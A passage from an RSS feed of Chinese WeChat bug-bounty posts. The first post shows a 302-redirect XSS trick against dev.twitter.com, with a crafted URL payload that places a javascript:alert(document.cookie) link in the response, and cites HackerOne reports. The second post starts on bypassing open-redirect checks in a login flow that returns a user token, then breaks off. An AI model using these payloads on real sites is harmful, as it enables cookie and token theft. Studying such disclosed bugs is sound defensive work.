      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499410&amp;idx=1&amp;sn=f8ee5f907fb162d3b81bdfa24a2291b7</link>
      <description></description>
      <content:encoded><![CDATA[<p>原创 <span>h1</span> <span>2026-05-06 10:02</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=769c3a0a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F7xtecWUgCRxceIPmXRUL7lnj3zqxVvfdkjvkQ5xcttb06ttgjB3HxDPt2nh74Wib93kOa2cFMggDBQSXZLABNgIm8j2dPbGSib5GHpGLSM74w%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">利用302实现xss的一个思路</span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=0c8bc540&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRz0qzKnFgnzlshH5CrpZqsiaXibIcqOAdGpcXrpdJ6VibaiauVZ1OaqY9DysnMGT1icnxjZB6TPK0iaFOkgkWXaA7hLNjKf143bZ9V44%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">正常情况下: 302</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf=""><a href="https://dev.twitter.com/https:/%5cblackfan.ru/" target="_blank">https://dev.twitter.com/https:/%5cblackfan.ru/</a></span><br style="box-sizing: border-box;cursor: pointer;"/><span style="box-sizing: border-box;color: rgb(92, 99, 112);font-style: italic;cursor: pointer;line-height: 26px;"><span leaf=""><a class="wx_topic_link" topic-id="moko3946-67anuw" style="color: #576B95 !important;" data-topic="1" data-recommend="">#响应</a></span></span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">HTTP/1.1 302 Found</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">connection: close</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">...</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">location: https:/\blackfan.ru</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">生成xss的poc:</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf=""><a href="https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/" target="_blank">https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/</a></span><br style="box-sizing: border-box;cursor: pointer;"/><span style="box-sizing: border-box;color: rgb(92, 99, 112);font-style: italic;cursor: pointer;line-height: 26px;"><span leaf=""><a class="wx_topic_link" topic-id="moko3946-lw4p44" style="color: #576B95 !important;" data-topic="1" data-recommend="">#响应</a></span></span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">HTTP/1.1 302 Found</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">connection: close</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">...</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">location: //x:1/://dev.twitter.com/javascript:alert(document.cookie)</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">...</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">&lt;p&gt;You should be redirected automatically to target URL: &lt;a href=</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;javascript:alert(document.cookie)&#34;</span></span><span leaf="">&gt;javascript:alert(document.cookie)&lt;/a&gt;.  If not click the link.</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">payload:</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">/x:1/:///%01javascript:alert(document.cookie)/ </span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">666</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=dc57861c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F7xtecWUgCRxEOkib2xr7S5UH1sYrgMiaAZTsBSeZib7DkxHsGIP5Oia2qb1ADGbITLmu8EAibKsdVVJsPmaN8k4D6mpBFclF230libDNcIC2eQPibM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">参考</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://hackerone.com/reports/260744" target="_blank">https://hackerone.com/reports/260744</a></span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://hackerone.com/reports/330008" target="_blank">https://hackerone.com/reports/330008</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=4aed1fe4&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499410%26idx%3D1%26sn%3Df8ee5f907fb162d3b81bdfa24a2291b7">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 06 May 2026 10:02:00 +0800</pubDate>
    </item>
    <item>
      <title>重定向绕过另类思路</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499404&amp;idx=1&amp;sn=5358483b915f29675284bf5124238704</link>
      <description></description>
      <content:encoded><![CDATA[<p>原创 <span>h1</span> <span>2026-05-05 10:00</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=9d8847bd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRxiaw8ayyiar4FCx4wpRib42kJNvPPqKXgR9aPUKxl1DToicqoCYDbZg6AnmQDa4C5IhVcz2ibfYico9Heg52kiajKTIWlWNalbSMECtY%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <h2 data-cacheurl="" data-pm-slice="0 0 []" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=34db9d3d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRxa2EJt2AHFoaAJRBVS3zI8fWu0gwUNF2FRibpc5Ve1zp2807GHsiakhPSk0SZWH55EEIo7JjcGBq0Bl4TJfzAWHAmxEvMKxQqiaY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">正常情况下的请求流程</span></p><ol style="box-sizing: border-box;margin: 8px 0px;cursor: pointer;list-style-type: decimal;padding: 0px 0px 0px 25px;color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">用户点击登录</span></p></li></ol><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">GET /login?redirectUrl=<a href="https://cs.money/dashboard&amp;callbackUrl=https://cs.money/dashboard" target="_blank">https://cs.money/dashboard&amp;callbackUrl=https://cs.money/dashboard</a> HTTP/1.1</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">Host: auth.dota.trade</span></code></pre><ol style="box-sizing: border-box;margin: 8px 0px;cursor: pointer;list-style-type: decimal;padding: 0px 0px 0px 25px;color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1" start="2"><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">登录成功后的重定向（服务端返回）</span></p></li></ol><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">HTTP/1.1 302 Found</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">Location: <a href="https://cs.money/dashboard?token=USER_TOKEN" target="_blank">https://cs.money/dashboard?token=USER_TOKEN</a></span></code></pre><ol style="box-sizing: border-box;margin: 8px 0px;cursor: pointer;list-style-type: decimal;padding: 0px 0px 0px 25px;color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1" start="3"><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 